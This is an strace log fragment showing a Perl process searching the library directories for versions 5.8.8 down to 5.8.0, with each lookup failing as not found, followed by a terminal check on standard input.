10452 20:06:45.534227 stat64("/usr/local/lib/site_perl/5.8.8/i486-linux-gnu-thread-multi", 0xbfd4e6b0) = -1 ENOENT (No such file or directory)
10452 20:06:45.534245 stat64("/usr/local/lib/site_perl/5.8.8", 0xbfd4e6b0) = -1 ENOENT (No such file or directory)
10452 20:06:45.534258 stat64("/usr/local/lib/site_perl/i486-linux-gnu-thread-multi", 0xbfd4e6b0) = -1 ENOENT (No such file or directory)
10452 20:06:45.534273 stat64("/usr/local/lib/perl/5.8.7", 0xbfd4e7f0) = -1 ENOENT (No such file or directory)
10452 20:06:45.534286 stat64("/usr/local/share/perl/5.8.7", 0xbfd4e7f0) = -1 ENOENT (No such file or directory)
10452 20:06:45.534298 stat64("/usr/local/lib/perl/5.8.6", 0xbfd4e7f0) = -1 ENOENT (No such file or directory)
10452 20:06:45.534310 stat64("/usr/local/share/perl/5.8.6", 0xbfd4e7f0) = -1 ENOENT (No such file or directory)
10452 20:06:45.534322 stat64("/usr/local/lib/perl/5.8.4", 0xbfd4e7f0) = -1 ENOENT (No such file or directory)
10452 20:06:45.534334 stat64("/usr/local/share/perl/5.8.4", 0xbfd4e7f0) = -1 ENOENT (No such file or directory)
10452 20:06:45.534345 stat64("/usr/local/lib/perl/5.8.3", 0xbfd4e7f0) = -1 ENOENT (No such file or directory)
10452 20:06:45.534357 stat64("/usr/local/share/perl/5.8.3", 0xbfd4e7f0) = -1 ENOENT (No such file or directory)
10452 20:06:45.534369 stat64("/usr/local/lib/perl/5.8.2", 0xbfd4e7f0) = -1 ENOENT (No such file or directory)
10452 20:06:45.534381 stat64("/usr/local/share/perl/5.8.2", 0xbfd4e7f0) = -1 ENOENT (No such file or directory)
10452 20:06:45.534392 stat64("/usr/local/lib/perl/5.8.1", 0xbfd4e7f0) = -1 ENOENT (No such file or directory)
10452 20:06:45.534404 stat64("/usr/local/share/perl/5.8.1", 0xbfd4e7f0) = -1 ENOENT (No such file or directory)
10452 20:06:45.534416 stat64("/usr/local/lib/perl/5.8.0", 0xbfd4e7f0) = -1 ENOENT (No such file or directory)
10452 20:06:45.534427 stat64("/usr/local/share/perl/5.8.0", 0xbfd4e7f0) = -1 ENOENT (No such file or directory)
10452 20:06:45.534450 ioctl(0, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbfd4e4e8) = -1 ENOTTY (Inappropriate ioctl for device)
